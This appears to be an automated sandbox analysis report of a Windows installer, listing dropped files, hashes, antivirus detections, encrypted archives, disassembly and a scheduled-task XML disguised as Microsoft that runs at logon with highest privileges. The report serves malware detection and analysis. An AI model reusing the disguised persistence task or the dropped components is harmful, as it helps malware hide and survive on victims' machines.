                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):1298992
                            Entropy (8bit):7.999859712098505
                            Encrypted:true
                            SSDEEP:24576:lS6oXJtF6HcpRkxQVgWmX5UP4igmlSjb+lnlM+xXd8ZEIzkiC6/ahnW0ISNJi:lS6oXJjecpRkiq/udgmlSnynS+z8qIYc
                            MD5:682645AD9182AA4DEB865D068B1CCE11
                            SHA1:7587BB39554B309CDE18010293B4AE06C0F36DA8
                            SHA-256:CF7D68ABF8390DF41C07606FC533D758B9C21D02A85372B39D395BDD255C08B7
                            SHA-512:A1CCA2B1F05DDB5FD601A9ABF472208B95EEF62466507C2C21DD7CE5513E475F8E07A20E612DD98F5031D20589D4E3805F3BC815D1C45058E2C2D2FC9C39FE6E
                            Malicious:false
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            • Antivirus: Virustotal, Detection: 6%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.344834847024567
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                            MD5:7F252B19B6E96247184F55570325E9FA
                            SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                            SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                            SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1048934
                            Entropy (8bit):7.999810584659191
                            Encrypted:true
                            SSDEEP:24576:zzo7JKPe56MvMbFP0ERf6gc0mgl2Cz8fyDPPK+tNTbotfxeeW:zzo1KPepUP/f6Z0NlZsyjy+tZb4AeW
                            MD5:D6E21035CF34180A78FD0609ACFA9285
                            SHA1:721C65391A0C2E18987202864D1CB08F9545AA3D
                            SHA-256:D1B45E42ABAEB7560E8E186277974790F97E141CAFCC3FF920460E542F9CD1AF
                            SHA-512:566E9571B984CDBF2BC9E51101894BB0BF61E857C03D90888AB9EAF93B3BDB7368F274D21893281A4603FE6390CA66EE201E022D25DADBA804D3523DFDE69D6C
                            Malicious:false
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul7got/Z:NllUkot
                            MD5:71995B6B43EA2A2D49079E9E99E8D184
                            SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                            SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                            SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                            Malicious:false
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530561164569484
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:FFE4B45A6AE66BCB0FA01197725E2E27
                            SHA1:AA72B2B7AB2CAEE1068DDBB88302B8E366CF52C0
                            SHA-256:E69DC5ABBD55150D1A261D29754EE32283310D03F63C7B464F6B153817A33593
                            SHA-512:0D8E0E3C262493EC3F1805B1C063DA860A6DED98D1ECD9970FB4A402C8875A66A824B7BD889DA43841089EF208072DC15C6904EFC7D167FF4854C041778E0758
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530561164569484
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:FFE4B45A6AE66BCB0FA01197725E2E27
                            SHA1:AA72B2B7AB2CAEE1068DDBB88302B8E366CF52C0
                            SHA-256:E69DC5ABBD55150D1A261D29754EE32283310D03F63C7B464F6B153817A33593
                            SHA-512:0D8E0E3C262493EC3F1805B1C063DA860A6DED98D1ECD9970FB4A402C8875A66A824B7BD889DA43841089EF208072DC15C6904EFC7D167FF4854C041778E0758
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.926928632634154
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            File size:5'986'125 bytes
                            MD5:315719354db8520278ae3d022b90da14
                            SHA1:46a92e47bdea70bef469eca470bb3b280f0fcd06
                            SHA256:e9d2969683bcc59dee33d048904b3bfb7af7b140ce360a326bb5bb9b3ef3b57e
                            SHA512:7e8f27c638b512c07d65af3d38db4c494d1c839bf1e11158f75935986c6934cf6884cb8b2f48742d14ff747460599eb85e2f3a865584a6a9769b2776032747d2
                            SSDEEP:98304:XwREDF7dlsK9h1hNngwVtIyINldOA8WZFt9Z0lJdMwZgo:lNdNh7dIT3dOAlrMRB
                            TLSH:80561213F2CBE03EE05E0B3715B2A25484FB6A216522AE5796ECB4ECCF351601D3E647
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:0c0c2d33ceec80aa
                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007FE270CEA995h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007FE270D7C31Bh
                            call 00007FE270D7BE6Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007FE270D76B48h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007FE270CE4A43h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007FE270D77E73h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007FE270D7C3A3h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007FE270D8308Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007FE270D78768h
                            mov edx, dword ptr [004B4200h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
